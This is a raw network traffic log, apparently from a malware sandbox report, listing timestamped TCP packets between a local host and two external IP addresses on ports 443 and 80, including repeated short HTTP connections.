Jul 15, 2024 06:11:15.685120106 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.685208082 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.685230970 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.685257912 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.685264111 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.685286999 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.685302973 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.685825109 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.685852051 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.685880899 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.685890913 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.685915947 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.685931921 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.697875977 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.697910070 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.697958946 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.697983980 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.698002100 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.698087931 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.698122025 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.698144913 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.698151112 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.698177099 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.698203087 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.770817041 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.770881891 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.770984888 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.771025896 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.771044016 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.771142960 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.771209002 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.771229982 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.771248102 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.771275997 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.771307945 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.771543026 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.771595955 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.771612883 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.771624088 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.771648884 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.771667004 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.771962881 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.772015095 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.772033930 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.772042036 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.772069931 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.772088051 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.772295952 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.772341967 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.772357941 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.772366047 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.772391081 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.772408962 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.772663116 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.772711039 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.772741079 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.772748947 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.772777081 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.772799969 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.784923077 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.784990072 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.785032988 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.785062075 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.785087109 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.785164118 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.785212994 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.785218000 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.785245895 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.785275936 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.785304070 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.857714891 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.857753992 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.857887030 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.857923031 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.857969999 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.858050108 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.858099937 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.858119011 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.858125925 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.858159065 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.858513117 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.858561039 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.858578920 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.858586073 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.858613014 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.858630896 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.858781099 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.858829975 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.858844995 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.858850956 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.858879089 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.858897924 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.859253883 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.859294891 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.859316111 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.859322071 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.859354973 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.859601021 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.859644890 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.859661102 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.859668016 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.859694958 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.859731913 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.871731043 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.871788025 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.871824980 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.871851921 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.871869087 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.871892929 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.872056961 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.872101068 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.872114897 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.872131109 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.872154951 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.872174025 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.944746971 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.944792986 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.945080996 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.945080996 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.945106983 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.945365906 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.945405006 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.945559978 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.945583105 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.945599079 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.945599079 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.945626020 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.945645094 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.945645094 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.945962906 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.946001053 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.946027040 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.946033001 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.946057081 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.946355104 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.946377039 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.946408033 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.946413040 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.946436882 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.946742058 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.946765900 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.946793079 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.946798086 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.946824074 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.960330963 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.960365057 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.960436106 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.960443020 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.960643053 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.960828066 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.960875034 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.960897923 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:15.960910082 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:15.960942030 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:16.013266087 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:16.032239914 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:16.032314062 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:16.032402039 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:16.032438040 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:16.032459974 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:16.032557011 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:16.032607079 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:16.032640934 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:16.032675982 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:16.032699108 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:16.032699108 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:16.032730103 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:16.032795906 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:16.032839060 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:16.032864094 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:16.032871962 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:16.032902956 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:16.032913923 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:16.033449888 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:16.033483982 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:16.033519030 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:16.033524036 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:16.033554077 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:16.033561945 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:16.033572912 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:16.033601046 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:16.033634901 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:16.033641100 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:16.033682108 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:16.033708096 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:16.033763885 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:16.034060955 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:16.034092903 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:16.034127951 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:16.034133911 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:16.034162998 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:16.034174919 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:16.046068907 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:16.046102047 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:16.046230078 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:16.046262980 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:16.046314955 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:16.046437979 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:16.046469927 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:16.046504021 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:16.046511889 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:16.046541929 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:16.046560049 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:16.119380951 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:16.119415998 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:16.119551897 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:16.119571924 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:16.119589090 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:16.119616985 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:16.119642973 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:16.119672060 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:16.119702101 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:16.120219946 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:16.120249033 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:16.120285988 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:16.120305061 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:16.120333910 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:16.120739937 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:16.120764971 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:16.120799065 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:16.120811939 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:16.120839119 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:16.120867968 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:16.121203899 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:16.121226072 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:16.121273041 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:16.121284962 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:16.121314049 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:16.121335030 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:16.121645927 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:16.121670008 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:16.121720076 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:16.121731043 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:16.121762991 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:16.121782064 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:16.133162022 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:16.133191109 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:16.133317947 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:16.133357048 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:16.133424997 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:16.133572102 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:16.133593082 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:16.133630037 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:16.133644104 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:16.133673906 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:16.137044907 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:16.210743904 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:16.210781097 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:16.210845947 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:16.210920095 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:16.210927010 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:16.210983992 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:16.211008072 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:16.211013079 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:16.211013079 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:16.211080074 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:16.239413977 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:16.239413977 CEST	49727	443	192.168.2.5	185.149.100.242
Jul 15, 2024 06:11:16.239458084 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:16.239476919 CEST	443	49727	185.149.100.242	192.168.2.5
Jul 15, 2024 06:11:16.425280094 CEST	49728	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:11:16.430428028 CEST	80	49728	58.151.148.90	192.168.2.5
Jul 15, 2024 06:11:16.430512905 CEST	49728	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:11:16.430669069 CEST	49728	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:11:16.430692911 CEST	49728	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:11:16.435486078 CEST	80	49728	58.151.148.90	192.168.2.5
Jul 15, 2024 06:11:16.435519934 CEST	80	49728	58.151.148.90	192.168.2.5
Jul 15, 2024 06:11:17.960640907 CEST	80	49728	58.151.148.90	192.168.2.5
Jul 15, 2024 06:11:17.960695028 CEST	80	49728	58.151.148.90	192.168.2.5
Jul 15, 2024 06:11:17.960881948 CEST	49728	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:11:17.960916042 CEST	49728	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:11:17.963576078 CEST	49729	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:11:17.966119051 CEST	80	49728	58.151.148.90	192.168.2.5
Jul 15, 2024 06:11:17.968854904 CEST	80	49729	58.151.148.90	192.168.2.5
Jul 15, 2024 06:11:17.969032049 CEST	49729	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:11:17.969032049 CEST	49729	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:11:17.969573021 CEST	49729	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:11:17.974210024 CEST	80	49729	58.151.148.90	192.168.2.5
Jul 15, 2024 06:11:17.974513054 CEST	80	49729	58.151.148.90	192.168.2.5
Jul 15, 2024 06:11:19.472368956 CEST	80	49729	58.151.148.90	192.168.2.5
Jul 15, 2024 06:11:19.473021030 CEST	80	49729	58.151.148.90	192.168.2.5
Jul 15, 2024 06:11:19.473134995 CEST	49729	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:11:19.473135948 CEST	49729	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:11:19.475994110 CEST	49730	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:11:19.480662107 CEST	80	49729	58.151.148.90	192.168.2.5
Jul 15, 2024 06:11:19.484822989 CEST	80	49730	58.151.148.90	192.168.2.5
Jul 15, 2024 06:11:19.484905958 CEST	49730	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:11:19.485044956 CEST	49730	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:11:19.485044956 CEST	49730	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:11:19.492413044 CEST	80	49730	58.151.148.90	192.168.2.5
Jul 15, 2024 06:11:19.492656946 CEST	80	49730	58.151.148.90	192.168.2.5
Jul 15, 2024 06:11:20.972762108 CEST	80	49730	58.151.148.90	192.168.2.5
Jul 15, 2024 06:11:20.973547935 CEST	80	49730	58.151.148.90	192.168.2.5
Jul 15, 2024 06:11:20.973603964 CEST	49730	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:11:20.973673105 CEST	49730	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:11:20.978425026 CEST	80	49730	58.151.148.90	192.168.2.5
Jul 15, 2024 06:12:30.886069059 CEST	49731	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:12:30.891277075 CEST	80	49731	58.151.148.90	192.168.2.5
Jul 15, 2024 06:12:30.891374111 CEST	49731	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:12:30.891498089 CEST	49731	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:12:30.891510963 CEST	49731	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:12:30.896414995 CEST	80	49731	58.151.148.90	192.168.2.5
Jul 15, 2024 06:12:30.896475077 CEST	80	49731	58.151.148.90	192.168.2.5
Jul 15, 2024 06:12:32.362530947 CEST	80	49731	58.151.148.90	192.168.2.5
Jul 15, 2024 06:12:32.362739086 CEST	80	49731	58.151.148.90	192.168.2.5
Jul 15, 2024 06:12:32.362826109 CEST	49731	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:12:32.362868071 CEST	49731	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:12:32.367676973 CEST	80	49731	58.151.148.90	192.168.2.5
Jul 15, 2024 06:12:43.001965046 CEST	49732	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:12:43.007426977 CEST	80	49732	58.151.148.90	192.168.2.5
Jul 15, 2024 06:12:43.007529974 CEST	49732	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:12:43.007643938 CEST	49732	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:12:43.007667065 CEST	49732	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:12:43.012592077 CEST	80	49732	58.151.148.90	192.168.2.5
Jul 15, 2024 06:12:43.012753963 CEST	80	49732	58.151.148.90	192.168.2.5
Jul 15, 2024 06:12:44.551074982 CEST	80	49732	58.151.148.90	192.168.2.5
Jul 15, 2024 06:12:44.551480055 CEST	80	49732	58.151.148.90	192.168.2.5
Jul 15, 2024 06:12:44.551558018 CEST	49732	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:12:44.551654100 CEST	49732	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:12:44.556366920 CEST	80	49732	58.151.148.90	192.168.2.5
Jul 15, 2024 06:12:49.305466890 CEST	49733	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:12:49.310595989 CEST	80	49733	58.151.148.90	192.168.2.5
Jul 15, 2024 06:12:49.310683012 CEST	49733	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:12:49.310848951 CEST	49733	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:12:49.310873985 CEST	49733	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:12:49.315685034 CEST	80	49733	58.151.148.90	192.168.2.5
Jul 15, 2024 06:12:49.315715075 CEST	80	49733	58.151.148.90	192.168.2.5
Jul 15, 2024 06:12:50.818428993 CEST	80	49733	58.151.148.90	192.168.2.5
Jul 15, 2024 06:12:50.818603992 CEST	80	49733	58.151.148.90	192.168.2.5
Jul 15, 2024 06:12:50.818655014 CEST	49733	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:12:50.818706989 CEST	49733	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:12:50.823457003 CEST	80	49733	58.151.148.90	192.168.2.5
Jul 15, 2024 06:12:55.494715929 CEST	49734	80	192.168.2.5	58.151.148.90
